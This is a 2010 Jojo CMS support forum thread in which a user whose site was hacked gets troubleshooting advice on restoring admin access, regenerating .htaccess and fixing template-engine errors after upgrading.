OOOOPS !!! lost access to admin...

OOOOPS !!! lost access to admin..., a forum discussion on Jojo CMS. Join us for more discussions on OOOOPS !!! lost access to admin... on our Administration (backend and configuration) forum.

Back to Forum Index : Back to Administration (backend and configuration)   RSS
glouk glouk

19 Oct 2010
Posts: 46

Hi,
My jojo site was hacked sometime ago. seemed it had a security issue.... I managed to fix the front part, but did not realize at that time that i had lost access to the admin : when i go to http://demo.glouk.org/admin, i get a page with my standard front header, and nothing in it...
it's RC1. I tried upgrading to 1.0 stable but it's worse : i only get blank pages.
ran setup many times, did nothing...
Any insight ? I'm somewhat lost here, and of course i have quite an urgent need to add content to my demo site.
thanks.

glouk
mikec

Lead Developer

mikec

19 Oct 2010
Posts: 67

Open up phpMyAdmin (or what ever other tool you use for managing you database tables) and delete the rows from the page table that relate to the admin area.

Then run setup and it will re-add these and you should be able to log in again.

How was the site hacked? Was it the whole server that was hacked or just the Jojo site? Have you got the access logs from the time it was hacked that we could look at to investigate any possible security issue with Jojo?

- Mike
Rick Rick

19 Oct 2010
Posts: 336

The blank pages could be Dwoo falling over on some old smarty code. Any idea how it was hacked?
Rick Rick

19 Oct 2010
Posts: 336

Sorry for the above posts... I was on my old mobile and it gave a redirection limit error... I guess it kept posting instead of moving on to the following page.

[admin: repeated posts removed]
glouk glouk

19 Oct 2010
Posts: 46

About the hacking method : i do not remember exactly, but it was jojo specific :(. i did not memorize it : had something to do with php.

I'm sorry i did not post about it here, but i was so pissed off that i threw everything away.

as for the repair : i'll try it and come back to you

thanks

PS : i just understood about dwoo... 1.0 has left smarty behind ? means i have to rewrite all the smarty code ?
glouk glouk

20 Oct 2010
Posts: 46

Rick,

I followed your instructions, deleted the rows and they were recreated by setup, but still the same problem : http://demo.glouk.org/admin leads to a page with my front theme and no content... I join a screen capture...

I created a new clean install with jojo 1.0, and i get white pages when i install my plugin and theme

I wonder if this has to do with mod_rewrite ? that would explain why the front theme is applied when i load http://demo.glouk.org/admin

Maybe i messed up rewrite rules... or there remains a trace of the hacker...

if you have an idea here, i would be grateful, since i have an urgent need to update my website.

thanks
Rick Rick

20 Oct 2010
Posts: 336

The front theme will be applied to /admin/ if you're not logged in... It shows the login form within your website's theme. That may be what's happening there.

When you upgraded to 1.0, did the templating engine get automatically set to Dwoo? Usually a completely blank screen means that Dwoo couldn't run some code that was intended for Smarty. Eg section tags.

My initial thought was that you'd overridden the login template with a blank one... but I just tried loading your demo site and none of the asset files (images, css, javascript etc) are loading.

/ - loads
/index.php - redirects to /
/index.html - fails
/admin/ - loads (empty content area)
/css/styles.css - fails
/js/common.js - fails
/images/logo.jpg - fails
/images/newheader.gif - fails
/admin/edit/ - fails
/favicon.ico - loads

It almost looks like the whole site has been stripped back to two html files (/index.php and /admin/<something>).

I'd suggest fixing your htaccess file. To do this you simply need to make sure the directory has appropriate permissions, delete the file and load up your website. Jojo will recreate the file for you. See what that fixes. I hope this helps, keep us posted.

Also, does your template have stylesheet includes at the top? I see lines for stylesheets named header/home/films/film/plan etc. If you really want these to be separate files instead of combined into styles.css then you can add the rows in a customhead.tpl file in your theme's template folder. That will put them inside the head tags.

If you remember how the site was compromised, you might want to let the main devs know via the contact form rather than posting here :)
mikec

Lead Developer

mikec

20 Oct 2010
Posts: 67

Rick said...
If you remember how the site was compromised, you might want to let the main devs know via the contact form rather than posting here :)

Where's the fun in that :-)

I'm guess that, because the rest of us aren't seeing our few hundred sites being compromised, there isn't a known (in the hacker community) vulnerability in Jojo. There could have been/be security issues in one or more of the externals that we are not aware of.
glouk glouk

20 Oct 2010
Posts: 46

Well, it seems i have lost everything but my data here.

i've managed to access administration by reinstalling RC1 and deactivating my theme in phpMyadmin, but :

- all the specifics of my plugin, and especially administration pages, have disappeared in the process (maybe the setup ?)

- the front is not working anymore - i get this message :
"Your Jojo theme doesn't have a template.tpl file. It needs this to work.
For more information, you may want to try the Jojo documentation."
(of course this is not true)

- when i reactivate my theme it is automatically also applied to the admin, and everything disappears.


which means everything has to be rebuilt from scratch... i guess

unless someone has a way out of this...
Rick Rick

25 Oct 2010
Posts: 336

Is there a chance that there's something rather wonky in your plugin or theme that's playing havoc with everything?
Back to Forum Index : Back to Administration (backend and configuration)   RSS
You must be logged in to post a reply



You need to Register or Log In before posting on these forums.